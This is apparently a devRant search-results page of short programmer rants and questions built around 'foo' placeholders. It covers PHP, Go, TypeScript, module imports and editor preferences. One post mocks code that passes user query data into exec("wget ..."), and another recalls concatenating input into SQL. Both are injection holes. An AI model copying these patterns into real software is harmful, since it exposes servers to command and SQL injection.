end up kicking myself in a years time. Was wondering if any of y’all have had to make a similar choice in your career7 - - If you want this app better, stop posting crappy content or content you have to end up explaining. Simple, isn't it?4 - 'cat file | grep foo' .... For some unknown reasons, too. It sends shivers down my spine all the time - - - package bar; public class Foo { public static void main(){ System.out.println("Hello, World!"); } } I still wonder why I didn't start with Python, print('Hello, World') is a god damn one-liner11 -? - soo, i am unknowledgeable of ALL best practice. lets say i call a php file called loader.php with a $_GET['type'] parameter, then after i check if type is actually set i switch the parameter and my logic then does stuff appropriate for $type.. do i create a lot of sub files with the program logic in it or do i just create subfunction (which i have to pass variables if necessary)? Switch( $_GET['type'] ) { case 'foo': include "logic/foo.php"; break; default: echo "error"; break; } or is the whole concept totally alien and stupid? i most honestly say that i dont know exactly what i could google to find an answer3 - So apparently the variable names foo and bar come from an old military term FUBAR which means f-ed up beyond all recognition.... Those OG UNIX guys hid their memes really well - - - Reading code and getting that face palm moment String code = customer.getCode(); customer.setAccount("foo"); customer.setGroup("bar"); customer.setCode("new code"); Ok this is preparing the customer obj makes sence. Some 20 lines later customer.setCode(code);...... Wtf1 -. :) - My regex foo has gotten really weak. It took me unholy number of attempts to get ^\n{1,}$ right 😞.1 - - (Warning, wall of text) Settle an argument for me. Say you have a system that deals with proprietary .foo files. And there are multiple versions of foo files. And your system has to identify which version of foo you are using and validate the data accordingly. Now the project I was on had a FooValidator class that would take a foo file, validate the data and either throw an error or send the data on its merry way through the rest of the system. A coworker of mine argued that this was terrible practice because all of the foo container classes should just contain a validate method. I argued that it was a design choice and not bad practice just different practice. But I have also read that rather than a design choice that having a FooValidator is the right way to do OOP. Opinions?1 - Do you write your comments before or after you write the code? Do you write var foo = 1; and then go back a line above it / beside it to comment, or do you write the comment line / block first prior to writing the code statement?6 - Using variables names like asd, qwe, a, x in demo/tests. But using "Foo, bar" before shoeing to anyone. - <?php // This is the demo code of a PHP gotcha which took me some hours to figure out $hr = "\n<hr>\n"; $JSON = '{"2":"Element Foo","3":"Element Bar","Test":"Works"}'; $array = (array)json_decode($JSON); echo "Version: " . phpversion() . $hr; // Tested on: 5.5.35 and 7.0.15 var_dump($array); // Prints: array(3) { '2' => string(11) "Element Foo" '3' => string(11) "Element Bar" 'Test' => string(5) "Works" } echo $hr; var_dump($array['Test']); // Prints: string(5) "Works" echo $hr; var_dump($array[2]); var_dump($array['2']); var_dump($array["2"]); var_dump($array[3]); var_dump($array['3']); var_dump($array["3"]); // Prints: NULL + Notice: Undefined offset ... in ... echo $hr; $newArray = array(); foreach ($array as $key => $value) $newArray[$key] = $value; var_dump($newArray[2]); var_dump($newArray['2']); var_dump($newArray["2"]); // Prints three times: string(11) "Element Foo" var_dump($newArray[3]); var_dump($newArray['3']); var_dump($newArray["3"]); // Prints three times: string(11) "Element Bar"1 - Ok so I got namespace N. And namespaces N\a and N\b. I would like N\a\foo() to call N\b\bar(). But no matter what I do it says \N\b\bar() does not exist. What am I doing wrong?? I've tried including, using, requiring but nothing.8 - - package main // go is very frustrating. in their efforts to keep the language simple, they've broken its consistency :( // A A is just some arbitrary interface type A interface { Foo() } // B is an interface requiring a function that returns an A type B interface { Bar() A } // Aimpl implements A type Aimpl struct{} // Foo is Aimpl's implementation of A func (a Aimpl) Foo() {} // Bimpl attempts to implement B type Bimpl struct{} // Bar is Bimpl's attempt at implementing B. // problem is, if Bar returns an Aimpl instead of A, the interface is not satisfied // this is because Go doesn't support implicit upcasting on returns from interfaced objects. // if we were to simply change the declared return type of Bar() to 'A', without changing // the returned value, Bimpl will satisfy B. func (b Bimpl) Bar() Aimpl { return Aimpl{} } var _ B = Bimpl{} func main() { }2 - - Here's a fun fact (which actually will be accompanied with a source) about node.js. When you import or require a module it will be imported as a singleton. Or put another way, ```export const Foo = { };``` is one of the simplest* and most readable singletons you can have in that runtime. And of course here's the thing you always should be asking for when people make a claim like this... So why write this? Well some of you might feel inclined to write a medium (or other) post about "design patterns in Javascript" where you basically just translate the GOF book from Java to Javascript and now you have something that isn't just awkwardly translated Java code! - Just saw a production website where the routing looked like this:... - It's always a matter of much is there to do and in what language... There is the IDE-Zone, which is dominated by IntelliJ (CLion be praised when you do Rust or C++) for large stuff and heavy refactorings. Always disputted by VS Code with synced settings. It's nice and comfy and has every imaginable language supported good enough, especially when its smaller change in native code or web/scripting stuff. Then there is the "small changes" space, where Vim and VS Code struggle whos faster or which way sticks better in my brain... might be you SCP stuff down from a box and edit it to re-upload, or you use the ever-present vi (no "m" unfortunately) sometimes things are more easy for multi-caret editing (Ctrl-D or Alt-J), and sometimes you just want to ":%s/foo/bar/g" in vim. I am sure that each of these things are perfectly possible in each of the editors, but there is just reflexes in my editor choices. I try to stay flexible and discover strenghts of each one of my weapon of choice and did change the favorites. (Atom, Brackets, Eclipse, Netbeans, ...) However there are some things I tried often and they are simply not working for me... might for you. I don't care. and I'll just use some space to piss people off, because this is supposed to be a rant: nano just feels wrong, emacs is pestilence from satan that was meant for tentacles instead of fingers, sublime does cost money but should not, gives me a constant guilty feeling (and I don't like that) that, and all the editors from various desktop environments are wasted developer ressources. -. - - As hard as I fucking try, my stumbling block, every fucking time is exports/imports. I can't wrap my head around them, at all. What do you use in browser vs in node? Whats the *most commonly used standard*? Whats the difference between "modules.export = Foo;" vs "exports.Foo = Foo;" what about export class Foo? Is that the same as modules.export or export.Foo? Look at this shit... import FooComponent from "./Foo"; export default Foo const Foo = require("./foo") const Foo = require("./foo.js").Foo import { Foo } from "./Foo.js"; And probably a dozen others I don't know about. Why does there have to be so many fucking ways to do a fucking import/export? What the fuck is going on here?8 - I took a long time to use prepared statements in a production php application instead of directly constructing the SQL query with the variables I had... Like $sql = 'SELECT * FROM foo WHERE y = '.$search; - Failing to self study because i always get stuck on tutorials like so: Do a, now do b. You should now get C. You can then proceed with d etc. BUT I DON'T GET C. WHY NOT?! I FOLLOWED ALL YOUR FUCKING STEPS YOU SHITTY GUIDE/BOOK/ASSHOLE. So i had to get basics from school where i could ask questions to such stupid things. It got better, but i sometimes still run in to it, and still can't google foo my way out of it. - - TypeScript has two levels of private values (at least in the beta): private foo = false; // Cannot be accessed outside the object in TypeScript #bar = false; // cannot be accessed outside the object in both TypeScript and JavaScript.2 -;m trying to map, for example, something like to something like. I'm pretty sure its doable but I'm having a terrible time getting it to work.3 - - I'll listen to an album, try and understand the story, and search for the truth. I use to let musicians guide me. I'd look to them.. Musicians are great marketers. They're compelling, emotionally intelligent, and spiritual. What I'm trying to say is, I learned a lot of game from musicians. Seduction.. and that'll only get you so far. I just became aware of programming not to long ago. I have a mentor on money real estate, seduction, fashion, marketing, but I don't know anyone who is the guro of programming and development.2 - And here comes the next solution ... exec("wget ".$foo." > /dev/null 2>&1 &"); $foo contains data from the users query ... - I have a readonly object property foo on a typescript class. When I create an instance bar by calling the constructor, bar.foo doesn't compare equal to this.foo as seen from within bar several async calls later. What could I have possibly fucked up?5 - - -... Look at how they write docs: "->atPath('foo')" how can I fucking know what to pass instead of foo? I cannot make show fucking error message near the field. Are they writing such doc so that we would spend more time searching how to make show fucking simple error message? "The atPath() method defines the property which the validation error is associated to. Use any valid PropertyAccess syntax to define that property." Property on my entity is collection of $values . Tried passing 'values' - no effect.2 -
https://devrant.com/search?term=foo
CC-MAIN-2021-10
refinedweb
5,228
72.46
LoadDir From PyMOLWiki Overview Load all files of the suffix suff from the directory dirName, where suff and dirName are function parameters. Install - copy the source below to the a file called "loadDir.pml" somewhere on your computer - load the file with "run /your/path/toLoadDir/loadDir.pml" - run loadDir. See examples below. Examples # load the script run ~/loadDir.pml # load all SD files from /tmp loadDir /tmp, sdf loadDir /tmp, .sdf loadDir /tmp, *.sdf # even stupid stuff works; hopefully as one would want. # load all PDBs from /tmp loadDir /tmp, foo.woo.pdb # load all the PDBs in all the directories under ./binders/ERK loadDir ./binders/ERK/*, .pdb # load the PDBs into groups: now we can load all the files in the tree under # ./ERK into the group "ERK" and the files from ./SYK into the group "SYK" loadDir ./binders/ERK/*, .pdb, group=ERKb loadDir ./binders/SYK/*, .pdb, group=SYKb The Code from glob import glob from os.path import sep, basename def loadDir(dirName=".", suff="pdb", group=None): """ Loads all files with the suffix suff (the input parameter) from the directory dirName). dirName: directory path suff: file suffix. Should be simply "pdb" or "sdf" or similar. Will accept the wildcard and dot in case the user doesn't read this. So, "*.pdb", ".pdb", and "pdb" should work. The suffix can be anything valid that PyMOL knows how to natively load. group: groupName to add the files to. example: # load all the PDBs in the current directory loadDir # load all SD files from /tmp loadDir /tmp, "sdf" notes: make sure you call this script w/o quotes around your parameters: loadDir ., .pdb as opposed to loadDir ".", "*.pdb" Use the former. """ g = dirName + sep + "*." + suff.split(".")[-1] for c in glob( g ): cmd.load(c) if ( group != None ): cmd.group( group, basename(c).split(".")[0], "add" ) cmd.extend("loadDir", loadDir)
http://pymolwiki.org/index.php/LoadDir
CC-MAIN-2015-14
refinedweb
310
79.46
No bots with no captcha in Django forms. Project description No bots with no captcha. Easy and fast way to secure your django forms with no using of damned, hated by everyone captcha. INITIAL ACCTIONS Include nocaptcha in your settings’ installed apps - INSTALLED_APPS = ( - … ‘nocaptcha’, … ) TYPICAL USAGE Include nocaptcha in your form. Add secret password, that would be used in md5 hash and min_time value - the shortest time, that could be possible to fill your form. from nocaptcha.forms import NoCaptchaForm - class ContactForm(NoCaptchaForm, forms.Form): - secret_password = “NoCaptcha rocks!” min_time = 5 name = forms.CharField(label=”Name”) message = forms.CharField(label=”Message”, widget=forms.Textarea) BENEFITS From now on all the fieldnames in your form will be encoded into a md5(timestamp + fieldname + secret_password). The timestamp field will be created with the timestamp of the page initial get. If the form will be posted in less then min_time, the error will be raised. There will be added a few honeypots with tempting names like “name” or “password” hidden with “display: none” style. If any of them will be filled, the error will be raised. The honeypots are taken as sample from list of honeypots and their order is shuffled. With these changes, the chance that any bot would automatically pass through your form is minimaised to zero. So stop using tha damn, hated by everyone captcha. Use nocaptcha. REQUIREMENTS Django >= 1.1.1 Project details Release history Release notifications | RSS feed Download files Download the file for your platform. If you're not sure which to choose, learn more about installing packages.
https://pypi.org/project/nocaptcha/0.3/
CC-MAIN-2021-25
refinedweb
260
67.45
21 July 2010 17:54 [Source: ICIS news] TORONTO (ICIS news)--Vitol, in partnership with investment firm Helios, is in exclusive talks to acquire Shell’s downstream businesses in 19 African countries, the independent energy trading firm said on Wednesday. The deal would, if realised, include Shell’s downstream businesses in ?xml:namespace> The targeted businesses, which employed a staff of 2,500, included 1,300 retail sites and 1.2m cubic metres of terminal storage, it said. Not included were Shell’s lubricants business in In related news, Shell said this month it was continuing to look for buyers for refineries in In
http://www.icis.com/Articles/2010/07/21/9378268/vitol-in-talks-to-buy-shells-downstream-businesses-in-africa.html
CC-MAIN-2015-22
refinedweb
104
52.19
I am having an issue trying to create a New Model when using the Import Adaptive Web Service Model option. 1) I have been able to successfully create and deploy the adaptive RFC model for the same RFC. 2) The RFC is web enabled and works. 3) In the wizard for the WSDL source I am selecting "Local File System or Url". 4) In the wizard for Logical Destinations I am select "No logical Destinations" because my other option that uses "Defaults" does not work and I do not see them configured in the JCo list. I'm not sure if this is right or not but I can get back to this later. 5) For choose a WSDL file: I created a WSDL file because my WSDL url does not work but the file does on this step. 6) A screen come up with two grids, a list of namespaces on the top grid and entities on the bottom grid but this error shows up at the top : Invalid Entry! Only $,a-z,A-Z,0-9 are allowed ModelClassName Clash: GT_Final,GT_Final I can change the model class name for two "like" entries in the Entity list at the bottom but this only removes one of the error message and leaves me with "Invalid Entry! Only $,a-z,A-Z,0-9 are allowed". The Finish button stays disabled. Can someone help me? UPDATE: I get the same message when trying to consue the BAPI_FLIGHT_GETLIST web service Thank you, Newbie NWDS Developer- James Edited by: jpcosa on Feb 24, 2010 3:43 PM
https://answers.sap.com/questions/7054774/import-adaptive-web-svc-model-issue---modelclassna.html
CC-MAIN-2021-39
refinedweb
265
68.7
Answered by: Index a multiple value column in BCS external content type "SharePoint 2013" Question Regarding SharePoint 2013 Search, any body knows how to index/crawl a multiple values column ( in this column, values are seperated with comma or written in xml) ? In the index, I don't want the pure text value for this column but have a structured text value. The reason to do so is that We have a product database and the product could be related to a couple of categories, so in the category column it has multiple values and it is meaningless to crawl this column in pure text value. In the FAST ESP, I know we may create a custom index profile in which we can specify the way to crawl a specific property in XML format.Monday, December 24, 2012 2:30 AM Answers I find it. In SP 2013, this feature is replaced by "Custom content processing with the Content Enrichment web service callout" An implementation sample:, December 27, 2012 4:59 AM All replies I read this article and it says in FAST Search 2010, to do this I can create a custom pipeline extensibility and have it seperate the values by \u2029 character. I tried replacing ; with \u2029 directly to the column value but it doesn't work. My Question is : Does SharePoint 2013 Search support to create custom pipeline extensibility?Tuesday, December 25, 2012 1:50 AM I got a feeling that SharePoint 2013 Search doesn't even support this kind of situations. I just read some topics reagarding crawling a multi-value property in FAST for SharePoint 2010. In FAST for SharePoint 2010, the crawled property has a Multi-Valued attribute. However, in the new version this attribute is even GONE...Tuesday, December 25, 2012 7:52 AM I find it. In SP 2013, this feature is replaced by "Custom content processing with the Content Enrichment web service callout" An implementation sample:, December 27, 2012 4:59 AM I managed to get the content enrichment for multiple values property to work. The multiple value manged property comes into the item.ItemProperties as List<string> and the original property value is in its [0]. To make it to work, just split the values by ';' and insert them into a new List<string> object and add it to the outputprocessed item properties. Here is my sample code. You can also add a log feature to the web services to debug purpose. using System; using System.Collections.Generic; using System.Linq; using System.Runtime.Serialization; using System.ServiceModel; using System.ServiceModel.Web; using System.Text; using Microsoft.Office.Server.Search.ContentProcessingEnrichment; using Microsoft.Office.Server.Search.ContentProcessingEnrichment.PropertyTypes; using System.IO; namespace ContentEnrichmentService { public class ContentEnrichmentService :IContentProcessingEnrichmentService { public ProcessedItem ProcessItem(Item item) { ProcessedItem processedItem = new ProcessedItem { ItemProperties = new List<AbstractProperty>() }; WriteLog("Start to process content enrichment...\n"); processedItem.ItemProperties.Clear(); try { var categoryProperty = item.ItemProperties.Where(p => p.Name == "BCSVendorCategory").FirstOrDefault(); Property<List<string>> categoryProp = categoryProperty as Property<List<string>>; if (categoryProp != null && categoryProp.Value != null && categoryProp.Value.Count > 0) { string[] propValues = categoryProp.Value.First().Split(';'); List<string> listpropValues = propValues.ToList(); propValues.ToList().Remove(""); Property<List<string>> newCategoryProp = new Property<List<string>>(); newCategoryProp.Name = "VendorCategory"; newCategoryProp.Value = listpropValues; processedItem.ItemProperties.Add(newCategoryProp); WriteLog(string.Format("{0} values are added to property {1}.", newCategoryProp.Value.Count, newCategoryProp.Name)); } } catch (Exception ex) { WriteLog(string.Format("Exception is encountered. Error Message: {0}",ex.Message + "\n\t" + ex.StackTrace)); } return processedItem; } private void WriteLog(string msg) { using (var writer = new StreamWriter("C:\\Temp\\ContentEnrichmentWebServiceTraceLog_" + System.DateTime.Today.ToString("yyyyMMdd") + ".txt", true)) { writer.Write(System.DateTime.Now.ToString("MM/dd/yyyy HH:mm:ss") + "\t" + msg); writer.WriteLine(""); } } } } Saturday, December 29, 2012 2:20 AM - Proposed as answer by rk_muddala Saturday, February 8, 2014 10:50 AM Thanks for the links! I implemented a variation of the sample. My crawl doesn't seem to kick off the web service at all. I don't get any errors or warnings. I removed the trigger to force the web service to be used but it doesn't seem to be working. Was there anything you had to do to get things to fire? I ran all the PowerShell commands and added the configuration. Thanks! -=SteveTuesday, June 18, 2013 4:28 PM 1. Did you map the crawled property to a managed property and set in the InputProprties (in content enrichment configuration)? 2. Can you access this Content Enrichment web services in browser? 3. If the Content Enrichment web service and crawler server are on the same server, how is the memory usage status when doing full crawl? If memory is not suffcient, the app pool of this content enrichment web service will go down as well. 4. Do you have more than one Search Service Application created in the sp farm? If yes, remove the other search service application and try it again. These are the problems I experienced in the past couple of months. Also, I suggest you implement a simple txt log feature to your content enrichment web service to check the process.Tuesday, June 18, 2013 4:39 PM Thanks. I do have event log code to trace but nothing is in there. I only have 1 SSA and I can access the web service from the browser. I created a Managed Property to be the one that is multi-value (and is returned from the web service) but it is not mapped to a crawled property. Do I need to map that to something? -=SteveTuesday, June 18, 2013 5:14 PM No you don't need to map the outputproperty to any crawled property. Maybe you can try restart the Osearch service and Search Controller service, or delete and recreate a SSA. BTW, can you paste out your content enrichment powershell configuration?Tuesday, June 18, 2013 6:00 PM $ssa = Get-SPEnterpriseSearchServiceApplication $config = New-SPEnterpriseSearchContentEnrichmentConfiguration $config.DebugMode = $false $config.Endpoint = "" $config.FailureMode = "ERROR" $config.InputProperties = "EventDepartments" $config.OutputProperties = "EventDeptMulti" $config.SendRawData = $false Set-SPEnterpriseSearchContentEnrichmentConfiguration –SearchApplication $ssa –ContentEnrichmentConfiguration $config EventDepartments contains string values like -> "HR;IT;Marketing;Finance"Tuesday, June 18, 2013 6:14 PM It looks like an authentication problem. I guess is your sharepoint root site collection and it requires auth. Try moving content enrichment web service out to some other annonymous IIS website. This web services can be hosted anywhere as long as the search service can reach it.Tuesday, June 18, 2013 6:22 PM Thanks. I restarted my search servers and now I am getting some (error) feedback from the crawl. I need to dig in. -=SteveTuesday, June 18, 2013 6:53 PM Ok. I fixed my crawl and it is trying to call the enrichment web service. I am getting errors that the item cannot be sent to the content enrichment service. I moved the web service to a non SharePoint address and received the same error. The ULS logs shows attempts to call but no errors. I can't navigate to the service with the ProcessItem call. What do you get when you navigate to that? I am probably going to put this aside for now and focus on moving forward with other items. -=SteveWednesday, June 19, 2013 4:36 PM Paste out your enrichmentservice.svc.cs code to see if there is anything wrong in your code.Wednesday, June 19, 2013 5:56 PM I turned on Verbose logging and found that there is an authentication issue: The HTTP request is unauthorized with client authentication scheme 'Anonymous'. The authentication header received from the server was 'Negotiate,NTLM'. I had Anonymous and Windows Authentication Enabled on the web service web site. When I turn Anonymous off, I get the following when attempting to browse the service:. My web.config probably "ain't right". I am trying to add the bindings and such as explained on other sites. I can't add an endpoint as per the example, they remove the IService.cs, and therefore I don't have a Contract on the service. What does your web.config look like? What settings in IIS are correct? Thanks! -=SteveWednesday, June 26, 2013 7:20 PM I dorked around some more and got it to work. I re-enabled Anonymouse and used this as my bindings: <bindings> <basicHttpBinding> <binding name="httpBinding"> <security mode="TransportCredentialOnly"> <transport clientCredentialType="None" /> </security> </binding> </basicHttpBinding> </bindings> Now I just need to put the real code back into the service!Wednesday, June 26, 2013 7:57 PM - <system.serviceModel> <behaviors> <serviceBehaviors> <behavior> <!--="true"/> </behavior> </serviceBehaviors> </behaviors> <protocolMapping> <add binding="basicHttpsBinding" scheme="https" /> </protocolMapping> <serviceHostingEnvironment aspNetCompatibilityEnabled="true" multipleSiteBindingsEnabled="true" /> > </system.serviceModel>Thursday, June 27, 2013 1:47 AM Any chance someone the enrichment service it to work on a farm with multiple SSA's + multiple servers? It does work on my Dev environment (one SSA, one server, service is locally). It is registered: Endpoint : Timeout : 9999 FailureMode : Error InputProperties : {AgileProject} OutputProperties : {AgileProject} Trigger : DebugMode : False SendRawData : False MaxRawDataSize : 100000 But it doesn't work, and doesn't write ULS logs either. So I'm clueless. The service app pool is the same one that runs the search. Anonymous access is set, tried everything there is in the post regarding the web.config. Any ideas?Tuesday, May 13, 2014 3:21 PM It works in my multiple servers environment. For multiple SSAs, I am not sure if it work or not. I have never run into that situation. Anyway, you may delete the SSAs and have only one SSA in the farm to narrow it down.Wednesday, May 14, 2014 1:26 AM Thanks. Deleting the second SSA did solve it. The thing is that there are multiple SSA's on the production environment, So, at this moment the enrichment service won't be happening, unless there is a solution for multiple SSA's, or someone comes up with another way to modify the refinement in runtime... Thanks.Thursday, May 15, 2014 10:53 AM
https://social.msdn.microsoft.com/Forums/windowsapps/en-US/7fa6fe7b-8ea5-42eb-b9d6-fa396da3eff9/index-a-multiple-value-column-in-bcs-external-content-type-quotsharepoint-2013quot?forum=sharepointsearch
CC-MAIN-2021-31
refinedweb
1,658
50.43
Recently,. public class A { public string Name { get; } [JsonConstructor] public A(string name) { Name = name; } } public class B { public A Test { get; set; } = new A("Default"); }Now let's serialize an instance of B in the following way: var serializedText = JsonConvert.SerializeObject(new B() { Test = new A("Fun") { } });In the result, as expected, we will get the following text: {"Test":{"Name":"Fun"}} Now let's deserialize this string: var result = (B)JsonConvert.DeserializeObject(serializedText, typeof(B));Now question for 1 million dollars. What will be the value of A.Test.Name in a deserialized object. If you say Fun you are wrong! It will be Default! I was surprised and I spent some time investigating this issue. Why did it happen? Well, it seems to me that when Json.NET creates a new object during deserialization and it notices that some property of this object is not null, them this default value will not be overriden. If it's a problem, there are at least 2 solutions: - Remove a default value for this property. It doesn't matter if it is set in a constructor of via a property initializer. - Add a special constructor. For instance, for class B it'll look as below. This constructor instructs Json.NET that Test property must be set even if a default value exists. public class B { public A Test { get; set; } = new A("Default"); public B() {} [JsonConstructor] public B(A test) { Test = test; } } *The picture at the beginning of the post comes from own resources and shows elephants from Warsaw zoo. 6 comments: Isn't the problem much simpler than property construction? A.Name is written as read only. Whether the deserializer creates an instance of A to assign to B.Test or uses an existing instance (your "Default") is irrelevant. B.Test.Name is still read-only. Thanks for the comment. Next time I will use more descriptive names for classes ;) As to "making the properties read/write". It should help to make A.Name writable. However, it is not always possible. I've ran into an issue with default values and Preserve References, see Upon deserialization you should use var result = JsonConvert.DeserializeObject<B>(serializedText, new JsonSerializerSettings { ObjectCreationHandling = ObjectCreationHandling.Replace }); @Tyler Brinkley - Thanks, I didn't know this one.
https://www.michalkomorowski.com/2017/08/jsonnet-also-tricked-me.html
CC-MAIN-2019-13
refinedweb
379
51.44
Announcing the .NET Framework 4.8 We are thrilled to announce the release of the .NET Framework 4.8 today. It’s included in the Windows 10 May 2019 Update. .NET Framework 4.8 is also available on Windows 7+ and Windows Server 2008 R2+. You can install .NET 4.8 from our .NET Download site. For building applications targeting .NET Framework 4.8, you can download the NET 4.8 Developer Pack. If you just want the .NET 4.8 runtime, you can try: - .NET 4.8 Web Installer – requires an internet connection during installation - .NET 4.8 Offline installer – can be downloaded and installed later in a disconnected state. Supported Windows Versions Windows Client versions: Windows 10 version 1903, Windows 10 version 1809, Windows 10 version 1803, Windows 10 version 1709, Windows 10 version 1703, Windows 10 version 1607, Windows 8.1, Windows 7 SP1 Windows Server versions: Windows Server 2019, Windows Server version 1803, Windows Server 2016, Windows Server 2012, Windows Server 2012 R2, Windows Server 2008 R2 SP1 New Features in .NET Framework 4.8 Runtime – JIT improvements The JIT in .NET 4.8 is based on .NET Core 2.1. All bug fixes and many code generation-based performance optimizations from .NET Core 2.1 are now available in the .NET Framework. Runtime – NGEN improvements NGEN images in the .NET Framework no longer contain writable & executable sections. This reduces the surface area available to attacks that attempt to execute arbitrary code by modifying memory that will be executed. While there will still be writable & executable data in memory at runtime, this change removes those mapped from NGEN images, allowing them to run in restricted environments that don’t permit executable/writable sections in images. Runtime – Antimalware Scanning for All Assemblies In previous versions of .NET Framework, Windows Defender or third-party antimalware software would automatically scan all assemblies loaded from disk for malware. However, assemblies loaded from elsewhere, such as by using Assembly.Load(byte[]), would not be scanned and could potentially carry viruses undetected. .NET Framework 4.8 on Windows 10 triggers scans for those assemblies by Windows Defender and many other antimalware solutions that implement the Antimalware Scan Interface. We expect that this will make it harder for malware to disguise itself in .NET programs. BCL – Updated ZLib Starting with .NET Framework 4.5 we used the native version of ZLib (a native external compression library used for data compression) from in clrcompression.dll in order to provide an implementation for the deflate algorithm. In .NET Framework 4.8 we updated clrcompression.dll to use version 1.2.11 which includes several key improvements and fixes. BCL – Reducing FIPS Impact on Cryptography .NET Framework 2.0+ have cryptographic provider classes such as SHA256Managed, which throw a CryptographicException when the system cryptographic libraries are configured in “FIPS mode”. These exceptions are thrown because the managed versions have not undergone FIPS (Federal Information Processing Standards) 140-2 certification (JIT and NGEN image generation would both invalidate the certificate), unlike the system cryptographic libraries. Few developers have their development machines in “FIPS mode”, which results in these exceptions being raised in production (or on customer systems). The “FIPS mode” setting was also used by .NET Framework to block cryptographic algorithms which were not considered an approved algorithm by the FIPS rules. For applications built for .NET Framework 4.8, these exceptions will no longer be thrown (by default). Instead, the SHA256Managed class (and the other managed cryptography classes) will redirect the cryptographic operations to a system cryptography library. This policy change effectively removes a potentially confusing difference between developer environments and the production environments in which the code runs and makes native components and managed components operate under the same cryptographic policy. Applications targeting .NET Framework 4.8 will automatically switch to the newer, relaxed policy and will no longer see exceptions being thrown from MD5Cng, MD5CryptoServiceProvider, RC2CryptoServiceProvider, RIPEMD160Managed, and RijndaelManaged when in “FIPS mode”. Applications which depend on the exceptions from previous versions can return to the previous behavior by setting the AppContext switch “Switch.System.Security.Cryptography.UseLegacyFipsThrow” to “true”. Windows Forms – Accessibility Enhancements In .NET Framework 4.8 WinForms is adding three new features to enable developers to write more accessible applications. The features added are intended to make communication of application data to visually impaired users more robust. We’ve added support for ToolTips when a user navigates via the keyboard, we’ve added LiveRegions and Notification Events to many commonly used controls. To enable these features your application needs to have the following AppContextSwitches enabled in the App.config file: Windows Forms – UIA LiveRegions Support in Labels and StatusStrips UIA Live Regions allow application developers to notify screen readers of a text change on a control that is located apart from the location where the user is working. Examples of where this would come in handy could be a StatusStrip that shows a connection status. If the connection is dropped and the Status changes, the developer might want to notify the screen reader of this change. Windows Forms has implemented UIA LiveRegions for both the Label control and the StatusStrip control. Example use of the LiveRegion in a Label Control: Narrator will now announce “Ready” Regardless of where the user is interacting with the application. You can also implement your UserControl as a Live region: Windows Forms – UIA Notification Events In Windows 10 Fall Creators Update Windows introduced a new method of having an application notify Narrator that content has changed, and Narrator should announce the change. The UIA Notification event provides a way for your app to raise a UIA event which leads to Narrator simply making an announcement based on text you supply with the event, without the need to have a corresponding control in the UI. In some scenarios, this could be a straightforward way to dramatically improve the accessibility of your app. For more information about UIA Notification Events, see this blog post. An example of where a Notification might come in handy is to notify the progress of some process that may take some time. An example of raising the Notification event: Windows Forms – ToolTips on keyboard access Currently a control tooltip can only be triggered to pop up by moving a mouse pointer into the control. This new feature enables a keyboard user to trigger a control’s tooltip by focusing the control using a Tab key or arrow keys with or without modifier keys. This particular accessibility enhancement requires an additional AppContextSwitch as seen in the following example: - Create a new WinForms application - Add the following XML to the App.config file - Add several buttons and a ToolTip control to the application’s form. - Set tooltips for the buttons. - Run the application and navigate between the buttons using a keyboard: Windows Forms – DataGridView control accessible hierarchy changes Currently the accessible hierarchy (UI Automation tree) shows the editing box tree element as a child of currently edited cell but not as a root child element of DataGridView. The hierarchy tree update can be observed using Inspect tool: WCF – ServiceHealthBehavior Health endpoints have many benefits and are widely used by orchestration tools to manage the service based on the service health status. Health checks can also be used by monitoring tools to track and alert on the availability and performance of the service, where they serve as early problem indicators. ServiceHealthBehavior is a WCF service behavior that extends IServiceBehavior. When added to the ServiceDescription.Behaviors collection, it will enable the following: - Return service health status with HTTP response codes: One can specify in the query string the HTTP status code for a HTTP/GET health probe request. - Publication of service health: Service specific details including service state and throttle counts and capacity are displayed using an HTTP/GET request using the “?health” query string. Knowing and easily having access to the information displayed is important when trouble-shooting a mis-behaving WCF service. Config ServiceHealthBehavior: There are two ways to expose the health endpoint and publish WCF service health information: by using code or by using a configuration file. - Enable health endpoint using code - Enable health endpoint using config Return service health status with HTTP response codes: Health status can be queried by query parameters (OnServiceFailure, OnDispatcherFailure, OnListenerFailure, OnThrottlePercentExceeded). HTTP response code (200 – 599) can be specified for each query parameter. If the HTTP response code is omitted for a query parameter, a 503 HTTP response code is used by default. Query parameters and examples: - OnServiceFailure: - Example: by querying, a 450 HTTP response status code is returned when ServiceHost.State is greater than CommunicationState.Opened. - OnDispatcherFailure: - Example: by querying, a 455 HTTP response status code is returned when the state of any of the channel dispatchers is greater than CommunicationState.Opened. - OnListenerFailure: - Example: by querying, a 465 HTTP response status code is returned when the state of any of the channel listeners is greater than CommunicationState.Opened. - OnThrottlePercentExceeded: Specifies the percentage {1 – 100} that triggers the response and its HTTP response code {200 – 599}. - Example: by querying 70:350,95:500, when the throttle percentage is equal or larger than 95%, 500 the HTTP response code is returned; when the percentage is equal or larger than 70% and less then 95%, 350 is returned; otherwise, 200 is returned. Publication of service health: After enabling the health endpoint, the service health status can be displayed either in html (by specifying the query string:) or xml (by specifying the query string:) formats. returns empty html page. Note: It’s best practice to always limit access to the service health endpoint. You can restrict access by using the following mechanisms: - Use a different port for the health endpoint than what’s used for the other services as well as use a firewall rule to control access. - Add the desirable authentication and authorization to the health endpoint binding. WPF – Screen narrators no longer announce elements with Collapsed or Hidden visibility Elements with Collapsed or Hidden visibility are no longer announced by the screen readers. User interfaces containing elements with a Visibility of Collapsed or Hidden can be misrepresented by screen readers if such elements are announced to the user. In .NET Framework 4.8, WPF no longer includes Collapsed or Hidden elements in the Control View of the UIAutomation tree, so that the screen readers can no longer announce these elements. WPF – SelectionTextBrush Property for use with Non-Adorner Based Text Selection In the .NET Framework 4.7.2 WPF added the ability to draw TextBox and PasswordBox text selection without using the adorner layer (See Here). The foreground color of the selected text in this scenario was dictated by SystemColors.HighlightTextBrush. In the .NET Framework 4.8 we are adding a new property, SelectionTextBrush, that allows developers to select the specific brush for the selected text when using non-adorner based text selection. This property works only on TextBoxBase derived controls and PasswordBox in WPF applications with non-adorner based text selection enabled. It does not work on RichTextBox. If non-adorner based text selection is not enabled, this property is ignored. To use this property, simply add it to your XAML code and use the appropriate brush or binding. The resulting text selection will look like this: You can combine the use of SelectionBrush and SelectionTextBrush to generate any color combination of background and foreground that you deem appropriate. WPF – High DPI Enhancements WPF has added support for Per-Monitor V2 DPI Awareness and Mixed-Mode DPI scaling in .NET 4.8. Additional information about these Windows concepts is available here. The latest Developer Guide for Per monitor application development in WPF states that only pure-WPF applications are expected to work seamlessly in a high-DPI WPF application and that Hosted HWND’s and Windows Forms controls are not fully supported. .NET 4.8 improves support for hosted HWND’s and Windows Forms interoperation in High-DPI WPF applications on platforms that support Mixed-Mode DPI scaling 